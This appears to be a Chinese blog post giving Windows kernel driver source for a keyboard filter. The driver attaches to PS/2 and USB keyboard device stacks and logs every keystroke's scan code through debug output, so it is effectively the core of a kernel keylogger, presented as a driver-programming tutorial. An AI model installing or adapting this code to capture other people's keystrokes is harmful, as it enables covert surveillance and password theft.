1 #include <ntddk.h> 2 #include <ntddkbd.h> 3 #include <Ntstrsafe.h> 4 5 DRIVER_INITIALIZE DriverEntry; 6 DRIVER_UNLOAD UnloadDevice; 7 IO_COMPLETION_ROUTINE ReadCompleteCallBack; 8 DRIVER_DISPATCH DispatchGen; 9 __drv_dispatchType(IRP_MJ_POWER) DRIVER_DISPATCH DispatchPower; 10 __drv_dispatchType(IRP_MJ_PNP) DRIVER_DISPATCH DispatchPnP; 11 __drv_dispatchType(IRP_MJ_READ) DRIVER_DISPATCH DispatchRead; 12 13 #define KBD_DEVICE_NAME (L"\\Device\\KeyboardClass") 14 #define DEVICE_NUM (16) 15 16 typedef struct _KEY_LOG_DEV_EXT 17 { 18 PDEVICE_OBJECT pLowerDevObj; 19 } KEY_LOG_DEV_EXT, *P_KEY_LOG_DEV_EXT; 20 21 extern POBJECT_TYPE IoDriverObjectType; 22 ULONG g_ulKeyCount = 0; 23 24 int AttachDevice(PDRIVER_OBJECT In_pDriObj) 25 { 26 ULONG uli = 0; 27 28 for (uli = 0; uli < DEVICE_NUM; uli ++) 29 { 30 PFILE_OBJECT pFileObj = NULL; 31 PDEVICE_OBJECT pTargetDevObj = NULL; 32 PDEVICE_OBJECT pFilterDevObj = NULL; 33 PDEVICE_OBJECT pLowerDevObj = NULL; 34 WCHAR aWCDevName[32] = {0}; 35 UNICODE_STRING unstrDevName = {0}; 36 37 if (!NT_SUCCESS(RtlStringCchPrintfW(aWCDevName, 32, L"%s%u", KBD_DEVICE_NAME, uli))) 38 { 39 goto tab_continue; 40 } 41 RtlInitUnicodeString(&unstrDevName, aWCDevName); 42 43 if (!NT_SUCCESS(IoGetDeviceObjectPointer(&unstrDevName, FILE_ALL_ACCESS, &pFileObj, &pTargetDevObj))) 44 { 45 goto tab_continue; 46 } 47 48 if (!NT_SUCCESS(IoCreateDevice(In_pDriObj, sizeof(KEY_LOG_DEV_EXT), NULL, pTargetDevObj->DeviceType, pTargetDevObj->Characteristics, FALSE, &pFilterDevObj))) 49 { 50 goto tab_continue; 51 } 52 53 pLowerDevObj = IoAttachDeviceToDeviceStack(pFilterDevObj, pTargetDevObj); 54 if (pLowerDevObj == NULL) 55 { 56 IoDeleteDevice(pFilterDevObj); 57 pFilterDevObj = NULL; 58 goto tab_continue; 59 } 60 61 RtlZeroMemory(pFilterDevObj->DeviceExtension, sizeof(KEY_LOG_DEV_EXT)); 62 ((P_KEY_LOG_DEV_EXT)(pFilterDevObj->DeviceExtension))->pLowerDevObj = pLowerDevObj; 63 64 pFilterDevObj->DeviceType = pLowerDevObj->DeviceType; 65 pFilterDevObj->Characteristics = pLowerDevObj->Characteristics; 66 pFilterDevObj->StackSize = pLowerDevObj->StackSize + 1; 67 pFilterDevObj->Flags |= pLowerDevObj->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE); 68 69 tab_continue: 70 if (pTargetDevObj != NULL) 71 { 72 ObDereferenceObject(pTargetDevObj); 73 } 74 if (pFileObj != NULL) 75 { 76 ObDereferenceObject(pFileObj); 77 } 78 } 79 80 return 0; 81 } 82 83 VOID UnloadDevice(PDRIVER_OBJECT In_pDriObj) 84 { 85 LARGE_INTEGER liSleepTime = {0}; 86 PDEVICE_OBJECT pDevObj = NULL; 87 PRKTHREAD CurrentThread; 88 89 if (In_pDriObj == NULL) 90 { 91 return; 92 } 93 94 liSleepTime = RtlConvertLongToLargeInteger(1000 * 1000 * 1000); 95 CurrentThread = KeGetCurrentThread(); 96 KeSetPriorityThread(CurrentThread, LOW_REALTIME_PRIORITY); 97 98 pDevObj = In_pDriObj->DeviceObject; 99 while (pDevObj != NULL) 100 { 101 IoDetachDevice(((P_KEY_LOG_DEV_EXT)(pDevObj->DeviceExtension))->pLowerDevObj); 102 IoDeleteDevice(pDevObj); 103 pDevObj = pDevObj->NextDevice; 104 } 105 106 while (g_ulKeyCount != 0) 107 { 108 KeDelayExecutionThread(KernelMode, FALSE, &liSleepTime); 109 } 110 } 111 112 NTSTATUS DispatchGen(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP) 113 { 114 if (In_pDevObj == NULL || In_pIRP == NULL) 115 { 116 return STATUS_SEVERITY_ERROR; 117 } 118 119 IoSkipCurrentIrpStackLocation(In_pIRP); 120 return IoCallDriver(((P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension))->pLowerDevObj, In_pIRP); 121 } 122 123 NTSTATUS DispatchPower(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP) 124 { 125 if (In_pDevObj == NULL || In_pIRP == NULL) 126 { 127 return STATUS_SEVERITY_ERROR; 128 } 129 130 PoStartNextPowerIrp(In_pIRP); 131 IoSkipCurrentIrpStackLocation(In_pIRP); 132 return PoCallDriver(((P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension))->pLowerDevObj, In_pIRP); 133 } 134 135 NTSTATUS DispatchPnP(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP) 136 { 137 NTSTATUS ntsRetVal = STATUS_SUCCESS; 138 P_KEY_LOG_DEV_EXT pDevExt = NULL; 139 PIO_STACK_LOCATION pIRPStack = NULL; 140 141 if (In_pDevObj == NULL || In_pIRP == NULL) 142 { 143 ntsRetVal = STATUS_SEVERITY_ERROR; 144 goto fun_ret; 145 } 146 147 pDevExt = (P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension); 148 pIRPStack = IoGetCurrentIrpStackLocation(In_pIRP); 149 if (pDevExt == NULL || pIRPStack == NULL) 150 { 151 ntsRetVal = STATUS_SEVERITY_ERROR; 152 goto fun_ret; 153 } 154 155 IoSkipCurrentIrpStackLocation(In_pIRP); 156 ntsRetVal = IoCallDriver(pDevExt->pLowerDevObj, In_pIRP); 157 if (pIRPStack->MinorFunction == IRP_MN_REMOVE_DEVICE) 158 { 159 IoDetachDevice(pDevExt->pLowerDevObj); 160 IoDeleteDevice(In_pDevObj); 161 } 162 163 fun_ret: 164 return ntsRetVal; 165 } 166 167 NTSTATUS ReadCompleteCallBack(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP, PVOID In_pvContext) 168 { 169 static unsigned char s_ucFirstFlag = 1; 170 171 if (In_pDevObj == NULL || In_pIRP == NULL || In_pvContext == NULL) 172 { 173 return STATUS_SEVERITY_ERROR; 174 } 175 176 if (NT_SUCCESS(In_pIRP->IoStatus.Status)) 177 { 178 size_t i = 0; 179 size_t szSize = In_pIRP->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA); 180 PKEYBOARD_INPUT_DATA pKeyData = (PKEYBOARD_INPUT_DATA)(In_pIRP->AssociatedIrp.SystemBuffer); 181 if (s_ucFirstFlag == 1 && szSize >= 1) 182 { 183 s_ucFirstFlag = 0; 184 if (pKeyData[0].Flags % 2 == 1) 185 { 186 DbgPrint("%u\t%u\n", pKeyData[0].MakeCode, pKeyData[0].Flags - 1); 187 DbgPrint("==================================\n"); 188 } 189 } 190 for (i = 0; i < szSize; i ++) 191 { 192 DbgPrint("%u\t%u\n", pKeyData[i].MakeCode, pKeyData[i].Flags); 193 } 194 DbgPrint("==================================\n"); 195 } 196 197 InterlockedDecrement(&g_ulKeyCount); 198 199 if(In_pIRP->PendingReturned) 200 { 201 IoMarkIrpPending(In_pIRP); 202 } 203 return In_pIRP->IoStatus.Status; 204 } 205 206 NTSTATUS DispatchRead(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP) 207 { 208 if (In_pDevObj == NULL || In_pIRP == NULL) 209 { 210 return STATUS_SEVERITY_ERROR; 211 } 212 213 if (In_pIRP->CurrentLocation == 1) 214 { 215 In_pIRP->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST; 216 In_pIRP->IoStatus.Information = 0; 217 IoCompleteRequest(In_pIRP, IO_NO_INCREMENT); 218 return STATUS_INVALID_DEVICE_REQUEST; 219 } 220 221 InterlockedIncrement(&g_ulKeyCount); 222 223 IoCopyCurrentIrpStackLocationToNext(In_pIRP); 224 IoSetCompletionRoutine(In_pIRP, ReadCompleteCallBack, In_pDevObj, TRUE, TRUE, TRUE); 225 return IoCallDriver(((P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension))->pLowerDevObj, In_pIRP); 226 } 227 228 NTSTATUS DriverEntry(PDRIVER_OBJECT In_pDriObj, PUNICODE_STRING In_punstrRegPath) 229 { 230 ULONG uli = 0; 231 232 if (In_pDriObj == NULL || In_punstrRegPath == NULL) 233 { 234 return STATUS_SEVERITY_ERROR; 235 } 236 237 for (uli = 0; uli <= IRP_MJ_MAXIMUM_FUNCTION; uli ++) 238 { 239 In_pDriObj->MajorFunction[uli] = DispatchGen; 240 } 241 In_pDriObj->MajorFunction[IRP_MJ_READ] = DispatchRead; 242 In_pDriObj->MajorFunction[IRP_MJ_POWER] = DispatchPower; 243 In_pDriObj->MajorFunction[IRP_MJ_PNP] = DispatchPnP; 244 In_pDriObj->DriverUnload = UnloadDevice; 245 246 if (AttachDevice(In_pDriObj) != 0) 247 { 248 return STATUS_SEVERITY_ERROR; 249 } 250 return STATUS_SUCCESS; 251 }
1 //支持USB键盘 2 #define USB_DIRVER_NAME (L"\\Driver\\HidUsb") 3 #define USBKDB_DEVICE_NAME (L"\\Driver\\kbdhid") 4 5 extern "C" extern POBJECT_TYPE *IoDriverObjectType; 6 extern "C" 7 NTKERNELAPI 8 NTSTATUS 9 ObReferenceObjectByName( 10 IN PUNICODE_STRING ObjectName, 11 IN ULONG Attributes, 12 IN PACCESS_STATE PassedAccessState, 13 IN ACCESS_MASK DesiredAccess, 14 IN POBJECT_TYPE ObjectType, 15 IN KPROCESSOR_MODE AccessMode, 16 IN OUT PVOID ParseContext, 17 OUT PVOID * Object 18 ); 19 20 int AttachUsbDevice(PDRIVER_OBJECT In_pDriObj) 21 { 22 int iRetVal = 0; 23 PDRIVER_OBJECT pUsbDriverObj = NULL; 24 UNICODE_STRING unstrUsbDriverName = {0}; 25 NTSTATUS nsRefObjRetVal = STATUS_SUCCESS; 26 PDEVICE_OBJECT pTargetDevObj = NULL; 27 28 RtlInitUnicodeString(&unstrUsbDriverName, USB_DIRVER_NAME); 29 //所有Win7下调用这个函数失败的请注意第五个参数以及上面的声明。不靠谱的XP,不靠谱的国产书,不靠谱的网上代码。 30 nsRefObjRetVal = ObReferenceObjectByName(&unstrUsbDriverName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID *)&pUsbDriverObj); 31 if (!NT_SUCCESS(nsRefObjRetVal) || pUsbDriverObj == NULL) 32 goto fun_ret; 33 34 pTargetDevObj = pUsbDriverObj->DeviceObject; 35 while (pTargetDevObj) 36 { 37 BOOLEAN BFound = FALSE; 38 PDEVICE_OBJECT pAttDevObj = pTargetDevObj->AttachedDevice; 39 if (pAttDevObj == NULL) 40 { 41 pTargetDevObj = pTargetDevObj->NextDevice; 42 continue; 43 } 44 45 while (pAttDevObj) 46 { 47 if (MmIsAddressValid(pAttDevObj->DriverObject->DriverName.Buffer) 48 && pAttDevObj->DriverObject->DriverName.Length == wcslen(USBKDB_DEVICE_NAME) * sizeof(WCHAR)) 49 { 50 if (_wcsicmp(pAttDevObj->DriverObject->DriverName.Buffer, USBKDB_DEVICE_NAME) == 0) 51 { 52 BFound = TRUE; 53 break; 54 } 55 } 56 pAttDevObj = pAttDevObj->AttachedDevice; 57 } 58 59 if (BFound != FALSE) 60 { 61 PDEVICE_OBJECT pLowerDevObj = NULL; 62 PDEVICE_OBJECT pFilterDevObj = NULL; 63 P_KEY_LOG_DEV_EXT pDevExt = NULL; 64 65 if (NT_SUCCESS(IoCreateDevice(In_pDriObj, sizeof(KEY_LOG_DEV_EXT), NULL, pTargetDevObj->DeviceType, pTargetDevObj->Characteristics, FALSE, &pFilterDevObj))) 66 { 67 pLowerDevObj = IoAttachDeviceToDeviceStack(pFilterDevObj, pTargetDevObj); 68 if (pLowerDevObj != NULL) 69 { 70 pDevExt = (P_KEY_LOG_DEV_EXT)pFilterDevObj->DeviceExtension; 71 RtlZeroMemory(pDevExt, sizeof(KEY_LOG_DEV_EXT)); 72 pDevExt->pLowerDevObj = pLowerDevObj; 73 pDevExt->ulDevType = DEVICE_TYPE_FLT; 74 75 pFilterDevObj->DeviceType = pLowerDevObj->DeviceType; 76 pFilterDevObj->Characteristics = pLowerDevObj->Characteristics; 77 pFilterDevObj->StackSize = pLowerDevObj->StackSize + 1; 78 pFilterDevObj->Flags |= pLowerDevObj->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE); 79 } 80 else 81 IoDeleteDevice(pFilterDevObj); 82 } 83 } 84 85 pTargetDevObj = pTargetDevObj->NextDevice; 86 } 87 88 fun_ret: 89 if (NT_SUCCESS(nsRefObjRetVal) && pUsbDriverObj != NULL) 90 { 91 ObDereferenceObject(pUsbDriverObj); 92 } 93 return iRetVal; 94 }
本文首发于博客园,任何其他站点均为爬虫或转载,爬虫最无耻。
